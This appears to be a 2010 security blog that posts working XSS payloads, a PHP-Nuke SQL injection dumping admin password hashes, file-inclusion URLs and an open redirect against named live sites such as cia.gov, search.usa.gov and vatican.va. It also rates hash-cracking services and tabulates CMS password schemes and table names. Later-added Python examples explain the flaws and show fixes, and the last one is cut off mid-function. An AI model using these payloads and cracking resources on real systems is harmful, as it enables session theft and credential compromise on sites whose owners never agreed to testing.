Friday, 30 April 2010

vatican.va | XSS - SQL injection - system compromise

Yes, it could be done.
More information soon on this blog. (Remember ... no defacements, no data retrieval, no bad things.)


Meanwhile I've found this simple XSS (put an XSS payload in any text box):

http://asv.vatican.va/cercait/index.php?advanced=1
 "><video src=1 onerror=alert(document.cookie)>

Anyway, I'm playing with something else that is more interesting.

http://www.gossipnews.it | xss

XSS in almost all the pages.

--------------------------OLD-----------------------
http://www.gossipnews.it/cinema/vedifoto.php?id=3cbd57ad5223375ca2a5089283966818&num=19%3Cscript%3Ealert(document.cookie);%3C/script%3E&

http://www.gossipnews.it/musica/gli_zero_assoluto_fotorw.html?id=5ccabcbfb5861ba35a6b271c76a5ade0&num=5%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22

Redirect to any location (HTTP header injection through the oadest parameter):
http://www.gossipnews.it/open/www/delivery/ck.php?oaparams=2__bannerid=537__zoneid=50__cb=1812239d6e__oadest=http%3A%2F%2Fwww.google.com
--------------------------------------NEW -------------------------------
http://www.gossip.it/news/monografia.php?keyword=ssasdadas"><script>alert(1);</script>

teletu.it | XSS

http://supporto.teletu.it/cerca/?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&search=1

XSS in any of the forms:
http://www.teletu.it/teletu/nuova-linea.php
http://www.teletu.it/tuttocompreso/offerte/tutto-per-te.php

webnews.it | xss

http://cerca.webnews.it/w.sl?us=fs&q=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22&t=webnews&cat=

cia.gov | XSS

The < and > characters are not allowed, but " and = can be injected, so we can add to the existing <input> tag a style attribute that enlarges the field and an onmouseover handler, so that JavaScript fires when the mouse passes over the (enlarged) text input.
Other things could be done too, but this should be enough.

https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)


Screenshot

www.adnkronos.com | XSS - Local file inclusion (php)

XSS

The id parameter lands inside the script string passed to setTimeout (the first payload fires after 300000 ms; the second closes that setTimeout with a 1 ms delay and opens a new one to swallow the rest of the script):
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+'
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert('

Local File Inclusion
The same problem exists in several parts of the website, although blind there (no error in the output).
http://www.adnkronos.com/IGN/Zoom/?id=

Sample error (after adding a ' to the id):
Warning: include(news/3.0.4217592951\'.inc.php) [function.include]: failed to open stream: No such file or directory in /opt/apache2/www60/IGN/Zoom/index.php on line 11

Warning: include() [function.include]: Failed opening 'news/3.0.4217592951\'.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /opt/apache2/www60/IGN/Zoom/index.php on line 11

The error doesn't always appear. Probably the responses come from different servers and only one of them shows the errors in the output. I'm not really sure and I'm not doing any further testing (files are included and executed for sure).
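
The include pattern visible in those warnings (a user-controlled id concatenated into a file path, with only quote escaping in front of it) is shown below in an added Python example that is not adnkronos.com's code. The directory, the id format and the function names are assumptions; the emulated PHP addslashes() and the path check are the point.

```python
# Added example (not adnkronos.com's code): the include pattern reconstructed
# from the PHP warnings above is include('news/' . $id . '.inc.php'), with
# addslashes()/magic_quotes_gpc turning the injected ' into \'. Directory
# layout, id format and function names are assumed for the demo.
import os
import re

NEWS_DIR = "/opt/apache2/www60/IGN/Zoom/news"  # taken from the warning's path
ID_RE = re.compile(r"[0-9]+(?:\.[0-9]+)*")       # assumed: ids look like 3.0.4217592951


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escapes single quote, double quote, backslash and NUL."""
    table = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\0": "\\0"}
    return "".join(table.get(ch, ch) for ch in s)


def vulnerable_include_path(user_id: str) -> str:
    """What the application does: quotes are escaped, but '../' contains no
    quote, so the id still walks out of news/."""
    return os.path.join(NEWS_DIR, addslashes(user_id) + ".inc.php")


def escapes_news_dir(path: str) -> bool:
    """True when the normalised path is outside NEWS_DIR."""
    return os.path.commonpath([os.path.normpath(path), NEWS_DIR]) != NEWS_DIR


def safe_include_path(user_id: str) -> str:
    """Allow-list the id format, then confirm the resolved path is still under
    NEWS_DIR (realpath also follows symlinks, which normpath would not)."""
    if not ID_RE.fullmatch(user_id):
        raise ValueError("id does not match the expected format")
    base = os.path.realpath(NEWS_DIR)
    candidate = os.path.realpath(os.path.join(base, user_id + ".inc.php"))
    if os.path.commonpath([candidate, base]) != base:
        raise ValueError("resolved path escapes the news directory")
    return candidate


def include_allowed(user_id: str) -> bool:
    """Boolean wrapper around safe_include_path for callers that log and refuse."""
    try:
        safe_include_path(user_id)
        return True
    except ValueError:
        return False
```

addslashes() only touches quotes, backslashes and NUL, so a traversal sequence passes through untouched; the fixed ".inc.php" suffix is the only thing limiting which files get included, and on PHP versions older than 5.3.4 a NUL byte in the parameter was enough to cut such a suffix off. The hardened version refuses any id that does not match the expected pattern and then checks where the resolved path actually points.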

www.opensourcecms.com www.tradepub.com | several XSS

Several XSS all over the website (more than those listed).


Samples (the XSS goes right after the id, or the page will redirect):

http://php.opensourcecms.com/scripts/details.php?scriptid=339%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cval=&name=Mac's%20CMS

http://php.opensourcecms.com/scripts/show.php?catid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&cat=CMS%20/%20Portals

http://php.opensourcecms.com/news/index.php?page=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&sortby=dateasc

http://php.opensourcecms.com/scripts/details.php?scriptid=19%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&name=e107
 
Sample on tradepub.com closing an HTML comment:
http://php-opensourcecms.tradepub.com/?pt=cat&page=Cons--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- 




There are several others.

Thursday, 29 April 2010

Portable Oracle XE - Help needed

I'm working on a portable version of Oracle XE (server) for Windows. The NSIS script and all the relevant files will be released as open source (no specific license will be used).
I will gladly share the gathered data: the list of binary files, the registry files (.reg), etc.
At the moment I'm still collecting the registry modifications, which are a lot, especially for the registered components.
There are also modifications to the group policies made by the Oracle installer; I've only looked at them and still don't know how much time they will require.
The Oracle ODBC installation is half working.
Obviously the final version will not include Oracle's binary files.

I have a static version with fixed paths.
If someone is interested in helping me, please leave a comment.

lostregone.net | XSS, file inclusion

Even with some server-side checks, the XSS went through:

http://www.lostregone.net/index.php?words=<video src=1 onerror=alert(String.fromCharCode(112,97,115,115,101,100))>&where=1&go=Vai!&rate=5&id=5062&cal_month=Apr&cal_year=2010&submitted=true&address=Indirizzo+E-mail&action=add

Remote file inclusion (the script is Liga Manager Online):
http://www.lostregone.net/GSC/gsc.php?action=table&tabtype=0&file=..

www.ilsannioquotidiano.it | XSS Sql Injection

The usual old PHP-Nuke bugs. No fun.

XSS
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=1%3Cscript%3Ealert(document.cookie);%3C/script%3E

Old PHP-Nuke SQL injection:
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=-9999999/%3Cscript%3E**%20%20/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

ilquaderno.it | XSS

http://www.ilquaderno.it/commenta-articolo.php?idart=46069%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.ilquaderno.it/qsearch.php?q=%3Cscript%3Ealert(1);%3C/script%3E

Blind SQL injection (in the links above). The site relies only on addslashes or magic_quotes_gpc, which can be bypassed.
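
As an added Python example (not the site's or PHP-Nuke's code) of why addslashes()/magic_quotes_gpc is no defence here: the printpage query above takes artid as a number, so the injection never needs a quote and the escaping has nothing to escape. The tables and rows are constructed for the demo and the function names are invented.

```python
# Added example (not ilquaderno.it's or any PHP-Nuke code): addslashes() /
# magic_quotes_gpc only escapes quote characters, so it does nothing for a
# parameter that is concatenated into SQL without quotes. The schema, the
# rows and the function names are constructed for the demo; the payload shape
# follows the PHP-Nuke printpage injection quoted above.
import sqlite3


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape single quote, double quote, backslash, NUL."""
    table = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\0": "\\0"}
    return "".join(table.get(ch, ch) for ch in s)


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the nuke_ tables (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE nuke_stories (sid INTEGER PRIMARY KEY, title TEXT, hometext TEXT);
        CREATE TABLE nuke_authors (aid TEXT, pwd TEXT);
        INSERT INTO nuke_stories VALUES (1, 'Hello', 'first story');
        INSERT INTO nuke_authors VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return conn


def printpage_vulnerable(conn: sqlite3.Connection, artid: str) -> list:
    """Input goes through addslashes() but lands unquoted in the WHERE clause.
    The /**/ in place of spaces and the trailing /* in the original payload are
    MySQL whitespace and comment tricks; plain spaces are used here."""
    sql = "SELECT title, hometext FROM nuke_stories WHERE sid=" + addslashes(artid)
    return conn.execute(sql).fetchall()


def is_valid_artid(artid: str) -> bool:
    """Numeric ids only; anything else is refused before it reaches SQL."""
    return artid.isdigit()


def printpage_safe(conn: sqlite3.Connection, artid: str) -> list:
    """Validate the type, then bind the value instead of concatenating it."""
    if not is_valid_artid(artid):
        return []
    return conn.execute(
        "SELECT title, hometext FROM nuke_stories WHERE sid=?", (int(artid),)
    ).fetchall()
```

The vulnerable query returns the authors table through the UNION while addslashes() leaves the payload byte for byte unchanged; the safe variant refuses the value on type alone and binds the integer, so the shape of the statement can no longer change.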

http://search.usa.gov | how funny the title is!

http://search.usa.gov/search?query=funny%3C/title%3E%3C/head%3E%3Cbody%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3C/body%3E%3C/html%3E%3C!--


http://search.usa.gov/search?query=funny</title></head><body><video src=1 onerror=alert(document.cookie)></body></html><!--


So the search echoes anything into the title without filtering.
I've just added the closing tags for the page head (</title></head>), a <body>, the script I want, the closing tags (</body></html>) and an opening comment at the end (<!--) so that the rest of the original page is commented out.
Quite funny that anybody can create a phishing page on usa.gov or steal users' sessions (if I have time I will show it in a simulated video; don't worry about the fact that you cannot have an account).
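
The three pages above put the same kind of untrusted string into three different contexts: an HTML attribute (cia.gov), a JavaScript string inside setTimeout (adnkronos) and the text of <title> (search.usa.gov). The added Python example below (not code from any of those sites; the templates and the loadZoom name are invented) renders each context the naive way and with the encoding that fits the context, using the payloads quoted in the posts.

```python
# Added example (not the code of cia.gov, adnkronos.com or search.usa.gov):
# one untrusted string reaching three HTML contexts, rendered the naive way
# and with context-appropriate encoding. The templates and the loadZoom name
# are invented stand-ins for the pages described above; the payloads are the
# ones quoted in the posts.
import html
import json
import re

ATTR_RE = re.compile(r'([A-Za-z][\w-]*)\s*=\s*"([^"]*)"')
ZOOM_ARG_RE = re.compile(r'loadZoom\(("(?:[^"\\]|\\.)*")\)')


def render_search_input(q: str, encode: bool) -> str:
    """Attribute context (cia.gov): < and > were filtered, but " and = were
    enough to append new attributes to the existing <input>."""
    value = html.escape(q, quote=True) if encode else q
    return '<input type="text" name="q" value="' + value + '">'


def render_title(q: str, encode: bool) -> str:
    """Text context (search.usa.gov): the query is echoed into <title>."""
    text = html.escape(q, quote=True) if encode else q
    return "<html><head><title>" + text + "</title></head><body>results</body></html>"


def render_zoom_script(item_id: str, encode: bool) -> str:
    """JS context (adnkronos Zoom): the id ends up inside a string passed to
    setTimeout. The fix is not to assemble code from strings at all: pass a
    function and hand the id over as a JSON literal, with </ escaped so a
    closing </script> inside the value cannot end the block early."""
    if not encode:
        return '<script>setTimeout("loadZoom(\'' + item_id + '\')", 300000);</script>'
    literal = json.dumps(item_id).replace("</", "<\\/")
    return "<script>setTimeout(function () { loadZoom(" + literal + "); }, 300000);</script>"


def tag_attributes(tag: str) -> dict:
    """Tiny attribute reader for one tag (demo only, not an HTML parser)."""
    return dict(ATTR_RE.findall(tag))


def zoom_argument(doc: str) -> str:
    """Recover the id the safe script actually passes to loadZoom."""
    return json.loads(ZOOM_ARG_RE.search(doc).group(1))
```

With the cia.gov payload the naive <input> ends up with five attributes instead of three, which is the whole attack; with html.escape(quote=True) the quote can no longer close the value and everything stays inside it. The same function neutralises the <title> break-out. The JavaScript case needs a different encoder (JSON), and the quoted adnkronos payload shows why: it never needs a double quote, so HTML escaping would have left it working.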

-----------------------------------------------------
If I have a bit of time I will finish and publish my thoughts about social engineering with a real example (this one?) and other methods to gain more privileges.

Hints -
The usa.gov URL shortener runs on Drupal:
http://go.usa.gov/shorturl/user/1  <- All the accounts are accessible and the usernames can be retrieved easily (this is normal ... by design)
http://go.usa.gov/robots.txt <- Drupal with all the installation files; only some folders and files are disallowed.
PHP  5.2.12 (read write on
They use the same methods as on drupa.ly.
-----------------------------------------------------

They don't reply to my emails ... and the problems from a previous post have never been patched, especially the remote code execution. Maybe if I post a tutorial a swarm of kids will start to play on their site.
Governments are slow as hell and never patch until someone tries to deface them (not me for sure) or someone else asks them for money for their "security" (not me in this case either ...).

What a mad world.



----------------------------------------------------------------
Blarg!!!!
Let me add a song to this boring and useless post that I'm forced to truncate.
These words explain what I think right now.

****
...
And I find it kinda funny I find it kinda sad
The dreams in which I'm dying
Are the best I've ever had
I find it hard to tell you
I find it hard to take
When people run in circles
It's a very, very mad world mad world
...


Tuesday, 27 April 2010

Online hash Crackers and Generators with ratings

Personal ratings. Links taken from Google.

-Online hash Generators-
http://www.insidepro.com/hashes.php?lang=eng | Almost any kind - maybe the best around
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://funprogs.topcities.com/hashgen.htm | NTLM/LM - good



-Online hash Crackers-
http://www.md5cracker.tk/ | MD5 - excellent - search on several md5 crack websites
http://www.google.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://www.yahoo.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://md5.hashcracking.com | MD5 - excellent - ~50,529,455,839 predefined hashes
http://www.tobtu.com/md5.php | MD5 - excellent
http://www.c0llision.net/ | MD5/NTLM/LM - excellent - requests via irc with several hashes - irc.after-all.org #md5crack
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://md5.rednoize.com/ | MD5/SHA1 - excellent
http://www.cmd5.org/ | MD5/md5(md5($pass))/sha1/md4/mysql/mysql5/md5($pass.$salt)/md5($salt.$pass)/md5(md5($pass).$salt)/md5(md5($salt).$pass)/md5($salt.$pass.$salt)/md5($salt.md5($pass))/md5(md5($pass).md5($salt))/md5(md5($salt).md5($pass))/sha1($username.$pass) - good
http://md5.overclock.ch/ | MD5 - good - server irc.rizon.net #md5
http://tools.benramsey.com/md5/ | MD5 - good - reverse hash
http://www.thepanicroom.org/index.php?view=md5 | MD5 - good - search on several md5 crack websites
http://sec-war.com/md5.php | MD5 - good - search on several md5 crack websites
http://passcracking.com | MD5 - good - w/ fast queue
http://www.md5decrypter.co.uk/ | NTLM/MD5/SHA1 - good (w/ captcha) multiple hashes (8)
http://gdataonline.com | MD5 - good - w/ multiple hashes (5)
http://www.cloudcracker.net | MD5/SHA1 - good
http://opencrack.hashkiller.com | MD5 - good - downloadable wordlist
http://www.md5this.com/crack-it-/index.php | MD5 - good - predefined+cracking - captcha(not working with opera)
http://www.md5crack.com | MD5 - medium
http://md5.thekaine.de | MD5 - medium - meta search engine
http://milw0rm.com/cracker/ | MD5/LM - poor (you need to wait for the spots) - decent wordlist
http://stupidsite.org/cracker/md5_cracker.php | MD5 - poor - predefined hashes
http://www.netmd5crack.com/cracker/ | MD5 - poor - predefined hashes
http://md5decryption.com | MD5 - poor - predefined hashes
http://www.bigtrapeze.com/md5/ | MD5 - poor - not updated; few results
http://md5hack.com/ | MD5 - poor
http://www.macrosoftware.ro/md5/index.php | MD5 - poor
http://www.md5decrypter.com/ | MD5 - poor
http://www.md5encryption.com/ | MD5 - poor
http://www.plain-text.info/ | MD5/LM/NTLM/MySQL v2.32/SHA1 - requests via irc - irc.rizon.net #rainbowcrack
http://www.hashchecker.com/index.php?_sls=add_hash | MD5 - Paid Service with 99,99% of results (?) - poor
http://md5.idiobase.de/ | MD5 - very poor
http://alimamed.pp.ru/md5/ | MD5 - poor
http://bokehman.com/cracker/ | MD5 - poor
http://www.schwett.com/md5/ | MD5 - poor
http://md5.allfact.info/ | MD5 - poor
http://www.mmkey.com/md5/home.php | MD5/SHA256/ - mostly useless
http://www.xmd5.org/ | MD5 - poor
http://www.tmto.org/ | MD5 - seems to be good - ~308,288,137,504 predefined hashes - not tested
http://www.tydal.nu/article/md5-crack/ | MD5 - not tested/not working
http://cracker.kalkulators.org | MD5/SHA1/SHA256/LM/NTLM - medium - meta search engine - nice looking interface

http://www.farefuturofondazione.it/ http://www.ffwebmagazine.it | XSS

Several XSS (no reason to list them all)

http://www.ffwebmagazine.it/ffw/page.asp?VisImg=S&Art=5592&Cat=1&I=e.gif%22 onerror="alert(document.cookie)" &IdTipo=0&TitoloBlocco=Attualit%C3%A0&Codi_Cate_Arti=24

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=n&IdTipo=0&Codi_Cate_Arti=23&TitoloBlocco=Economia"></a><img src=1 onerror="alert(document.cookie)"><a href="&IdMenu=80&NomeMenu=Economia

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=y&IdTipo=0&Codi_Cate_Arti=50&TitoloBlocco=%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3EIn%20Primo%20Piano

http://www.farefuturofondazione.it/ff/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&ASL=y&IdTipo=0&CCA=43&TB=Pubblicazioni%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E

http://www.farefuturofondazione.it/ff/page.asp?StrMotore=dada"><video src=1 onerror=alert(1)><"&Cat=Motore

Hash algorithms used in different web applications

I've compiled this list by hand. Not all the hash algorithms are correct (I've put a generic md5 or ??? where it is unknown).
If you are interested, send corrections and I will update it.
I will also publish a better version with tabs.
You can reproduce it freely; it's part of the mdcrack gui project on SourceForge.
Use | as the data separator.

-----------------------------------------------------------------------------------------------------------------------------------------------------
| Title | Hash Algorithm | TablePrefix | Table Name | Website |
-----------------------------------------------------------------------------------------------------------------------------------------------------
| 1C Битрикс | md5($pass) | | |http://www.1c-bitrix.ru/
| 1024cms | md5($pass) | | |http://www.1024cms.org/
| 4images | md5($pass) | | |http://www.4homepages.de/
| AboCMS | md5($pass) | ??? | users |http://www.abocms.com/
| AdaptCMS Lite | md5($pass) | | |http://www.adaptcms.com/
| Adrevenue | md5($pass) | | |http://www.adrevenue.co.uk/
| AEF | md5($salt.$pass) | | |http://www.anelectron.com/board/
| AIOCP | md5($pass) | | |http://www.aiocp.it/
| Artiphp | md5($pass) | | |http://www.artiphp.com/
| AVE CMS | md5(md5($pass)) | | |http://www.cmsmatrix.org/ave-cms
| b2evolution | md5($pass) | | |http://b2evolution.net/
| Basecmp | md5($pass) | | |http://www.basecmp.de/
| bbPress | md5($pass) | | |http://bbpress.org/
| beContent | md5($pass) | | |http://code.google.com/p/becontent
| Beehive | md5($pass) | ??? | User |http://www.magnettechnologies.com/products.htm
| BIGACE | md5($pass) | ????????? | |http://www.bigace.de/
| Bitrix | md5($pass) | | |http://www.bitrixsoft.com/
| bitweaver | md5($pass) | | |http://www.bitweaver.org/
| Black Pig (Sajon) | md5($pass) | | |http://www.blackpig.co.uk ????
| bloofoxCMS | md5($pass) | | |http://www.bloofox.com/
| ClanTiger | md5($pass) | | |http://www.clantiger.com/
| ClanSphere | md5($pass) or sha1($pass) | | |http://www.csphere.eu/
| CMScout | md5($pass) | | |http://www.cmscout.co.za/
| CMS Made Simple | md5($pass) | | |http://www.cmsmadesimple.org/
| Concrete5 | md5($pass) | | |http://www.concrete5.org/
| Constructr CMS | md5($pass) | | |http://constructr-cms.org/
| Contenido | md5($pass) | | |http://www.contenido.org/
| Contentteller CE | md5($pass) | | |http://www.contentteller.com/
| Coppermine PG | md5($pass) | | |http://coppermine-gallery.net/
| CPG-Nuke | md5($pass) | | |http://dragonflycms.org/
| CruxCMS | md5($pass) | | |http://www.cruxsoftware.co.uk/
| CustomerInfo | md5($pass) | | |
| DanneoCMS | md5($pass) | dn[version]_ | users |http://www.danneo.com
| DataLife Engine | md5(md5($pass)) | dle_ | users |http://dlecms.com/
| DBHcms | md5($pass) | | |http://www.drbenhur.com/
| DeluxeBB | md5($pass) | | |http://www.deluxebb.com/
| Diferior | md5(md5($pass)) | | |http://diferior.com/
| Digitalus | md5($pass) | | |http://digitaluscms.com/
| DotNetNuke | sha1($pass) | | |http://www.dotnetnuke.com/
| Drupal | md5($pass) | | |http://drupal.org/
| e107 | md5(md5($pass)) | e107_ | user |http://e107.org/
| eazyPortal | md5($pass) | | |http://www.eazyportal.com/
| ecshoprus | md5($pass) | | |http://ecshoprus.ru/
| eLinks | md5($pass) | | |http://elinks.or.cz/
| eliteCMS | sha1($pass) | | |http://www.elitecms.com/
| Elxis | md5($pass) | | |http://www.elxis.org/
| Enano CMS | md5($pass) | | |http://enanocms.org/
| eoCMS | md5($pass) | | |http://eocms.com/
| Etomite | md5($pass) | | |http://www.etomite.org/
| Explay | md5($pass) | | |
| Exponent | md5($pass) | | |http://www.exponentcms.org/
| Flux CMS | md5($pass) | | |https://fosswiki.liip.ch/display/FLX/
| Frog | sha1($pass) | | |http://www.madebyfrog.com/
| FUDforum | md5($pass) | | |http://fudforum.org/
| Fundanemt | md5($pass) | | |http://www.fundanemt.com/
| glFusion | md5($pass) | | |http://www.glfusion.org/
| GeekLog | md5($pass) | | |http://www.geeklog.net/
| html-edit CMS | md5($pass) | | |http://www.html-edit.org
| Icy Phoenix | md5($pass) | | |http://www.icyphoenix.com/
| iDevAffiliate | sha1(idev_secret.$password) | | |http://www.idevdirect.com/
| iGaming | md5($pass) | | |http://www.igamingcms.com/
| ImpressCMS | md5($pass) | | |http://www.impresscms.org/
| Injader | md5($pass) | | |http://www.injader.com/
| Intellect Board | md5($pass) | ??? | User |http://intboard.ru/
| IPB 1.x.x | md5($pass) | ibf_ | members |http://www.invisionpower.com/
| IPB 2.x.x | md5(md5($salt).md5($pass)) | ibf_ | members_converge|http://www.invisionpower.com/
| ITA Forum | md5($pass) | itaf_ | user |https://sourceforge.net/projects/itaforum/
| Jaws CMS | md5($pass) | | |http://www.jaws-project.com/
| Joomla <=1.0.12 | md5($pass) | jos_ | users |http://www.joomla.org/
| Joomla >=1.0.13 | md5($pass.$salt) | jos_ | users |http://www.joomla.org/
| Kajona | sha1($pass) | | |http://www.kajona.de/
| KerviNet Forum | md5($pass) | | |http://photoweb.com.ua/
| Koobi CMS | md5($pass) | koobi_ | user |http://www.dream4.de/
| Koobi CMS >= 6 | md5(md5($pass)) | koobi_ | user |http://www.dream4.de/
| Lanius CMS | md5($pass) | | |http://www.laniuscms.org/
| LifeType | md5($pass) | | |http://www.lifetype.net/
| Mambo | md5($pass) | | |http://mambo-foundation.org/
| MDPro | md5($pass) | | |http://www.maxdev.com/
| MercuryBoard | md5($pass) | mb_ | users |http://mercuryboard.com/
| MiaCMS | md5($pass) | | |http://miacms.org/
| MigasCMS | md5($pass) | | |http://www.sebrac.webcindario.com/
| MiniBB | md5($pass) | minibbtable_| users |http://www.minibb.com/
| MODx CMS | md5($pass) | | |http://modxcms.com/
| Monkey CMS | md5($pass) | | |http://www.monkeycms.com/
| myBB 1.2.x | md5(md5($salt).md5($pass)) | mybb_ | users |http://www.mybboard.net/
| Nucleus | md5($pass) | | |http://nucleuscms.org/
| osCommerce | md5($salt.$pass) | ??? | customers |http://www.oscommerce.com/
| ocPortal | md5($pass) | | |http://ocportal.com/
| OneCMS | md5($pass) | | |http://www.onecms.it/
| OpenBB 1.0.8 | md5($pass) | | |http://www.openbb.com/
| PBLang | md5($pass) | /db/members/| |https://sourceforge.net/projects/pblang/
| Pecio CMS | sha1($pass) | | |http://pecio-cms.com/
| Phenotype CMS | md5($pass) | | |http://www.phenotype-cms.com/
| Phorum 5.0.x | md5($pass) | | |http://www.phorum.org/
| Photopost | md5($pass) | | |http://www.photopost.com/
| phpAds | md5($pass) | | |http://sourceforge.net/projects/phpadsnew/
| PHP-Fusion | md5($pass) | | |http://sourceforge.net/projects/php-fusion/
| PHP-Nuke | md5($pass) | nuke_ | authors |http://phpnuke.org/
| phpBB | md5($pass) | phpbb_ | users |http://www.phpbb.com/
| phpBB >= 3 | md5($phpbb3) | phpbb_ | users |http://www.phpbb.com/
| PhpMyForum | md5($pass) | pmf_ | user |http://phpmyforum.de/
| phpMyAgenda | md5($pass) | | |http://sourceforge.net/projects/phpmyagenda/
| PhpMySport | md5($pass) | | |http://phpmysport.sourceforge.net/
| phpListPro | md5($pass) | | |http://www.smartisoft.com/products.php?product=phpListPro
| PHPSurveyor | md5($pass) | | |http://www.limesurvey.org/
| PunBB 1.2.x | sha1($pass) | ??? | users |http://www.punbb.org/
| PhpWebSite | md5($pass) | | |http://phpwebsite.appstate.edu/
| phpWebThings | md5($pass) | | |http://www.phpwebthings.nl/
| PHPX CMS | md5($pass) | | |http://www.thisrand.com/scripts/phpx
| phpwcms | md5($pass) | | |http://www.phpwcms.de/
| PLUME CMS | md5($pass) | | |http://www.plume-cms.net/
| PostNuke | md5($pass) | | |http://www.postnuke.com/
| Rennder Pixie | md5($pass) | | |http://www.renderpixie.com/
| QuickSilver Forum | md5($pass) | qsf_ | users |http://www.quicksilverforums.com/
| Radiant | sha1(sha1($pass)) | | |http://radiantcms.org/
| Refbase | des($pass,$salt);$salt=substr(email, 0, 2)| | |http://www.refbase.net/
| RunCMS | sha1($username.$pass) | runcms_ | users |http://www.runcms.org/
| Seditio | md5($pass) | | |http://www.neocrome.net/
| Serendipity <=1.4.1 | md5($pass) | | |http://www.s9y.org
| Serendipity >= 1.5 | sha1($pass) | | |http://www.s9y.org
| Shinobu | md5($pass) | | |http://shinobu.61924.nl/
| SilverStripe | md5($pass) | | |http://www.silverstripe.com/
| Slaed CMS | md5($pass) | slaed_ | users |http://www.slaed.net/
| SmallNuke 2 | md5($pass) | | |http://www.smallnuke.com/
| sNews | md5($pass) | | |http://www.snewscms.it/
| SMF 1.0.x | md5(HMAC) | smf_ | members |http://www.simplemachines.org/
| SMF 1.1.x | sha1($username.$pass) | smf_ | members |http://www.simplemachines.org/
| Snitz forums 2000 | SHA-256 | FORUM_ | MEMBERS |http://forum.snitz.com/
| Subrion | md5($pass) | | |http://www.subrion.com/
| TangoCMS | md5($pass) | | |http://tangocms.org/
| Tiki Wiki | md5($pass) | | |http://tikiwiki.org/
| Tinypug | md5($pass) | | |http://code.google.com/p/tinypug/
| TRIBiQ | md5($pass) | | |http://tribiq.com/
| Triton CMS | md5($pass) | | |http://www.tritoncms.com/
| Typo3 | md5($pass) | | |http://typo3.org/
| UseBB | md5($pass) | usebb_ | members |http://www.usebb.net/
| Vanilla | md5($pass) | LUM_ | user |http://www.vanillacms.com/
| vBulletin 2.16 | ??? | | user |http://www.vbulletin.org/
| VBulletin 3.x | md5(md5($pass).$salt) | | user |http://www.vbulletin.org/
| VikingBoard | md5($pass) | vboard_ | member |http://sourceforge.net/projects/vboard/
| Voodoo chat | md5($pass) | | |http://vochat.com/ ?????
| W-Agora | md5($pass) | [***]_ | users |http://www.w-agora.com/
| Website Baker | md5($pass) | | |http://www.websitebaker2.org/
| Webspell | md5($pass) | ws_ Rand(3)_| user |http://www.webspell.org/
| Wordpress | md5($pass) | wp_ | users |http://wordpress.org/download/
| Wordpress >= 2.5 | md5($phpbb3) | wp_ | users |http://wordpress.org/download/
| WWWThreads | DES($pass) | w3t_ | users |http://www.wwwthreads.com/
| Xaraya (XarBB) | md5($pass) | | |http://www.xaraya.com/
| XMB Forum | md5($pass) | ??? | members |http://www.xmbforum.com/
| XOOPS | md5($pass) | xoops_ | users |http://www.xoops.org/
| YaBB | md5(HMAC) | yabbse_ | members |http://www.yabbforum.com/
-----------------------------------------------------------------------------------------------------------------------------------------------------
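
The added Python example below (not part of mdcrack gui or of any project in the table) turns the table's notation into working verifiers for the salted and nested schemes, and implements the portable phpass hash that the table writes as md5($phpbb3) (phpBB 3, WordPress >= 2.5). Salts, usernames and passwords are constructed test data; the $P$ test vector is the one shipped in phpass's own test.php.

```python
# Added example (not from mdcrack gui or any of the projects listed): the
# salted and nested MD5/SHA-1 schemes from the table written out as
# verifiers, plus the phpass portable hash that the table calls md5($phpbb3)
# (phpBB 3, WordPress >= 2.5). Salts, usernames and passwords are constructed
# test data; the $P$ vector is the one shipped in phpass's own test.php.
import hashlib
import hmac


def md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def sha1(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


# table notation -> function(password, salt, username) on bytes -> hex digest
SCHEMES = {
    "md5($pass)": lambda p, s, u: md5(p),
    "md5(md5($pass))": lambda p, s, u: md5(md5(p).encode()),                         # e107, DataLife Engine
    "md5($pass.$salt)": lambda p, s, u: md5(p + s),                                  # Joomla >= 1.0.13
    "md5($salt.$pass)": lambda p, s, u: md5(s + p),                                  # osCommerce, AEF
    "md5(md5($pass).$salt)": lambda p, s, u: md5(md5(p).encode() + s),               # vBulletin 3
    "md5(md5($salt).md5($pass))": lambda p, s, u: md5((md5(s) + md5(p)).encode()),   # IPB 2, myBB 1.2
    "sha1($pass)": lambda p, s, u: sha1(p),
    "sha1($username.$pass)": lambda p, s, u: sha1(u + p),                            # SMF 1.1, RunCMS
}


def hash_password(scheme: str, password: str, salt: str = "", username: str = "") -> str:
    """SMF 1.1 lower-cases the username before hashing; that is done here for
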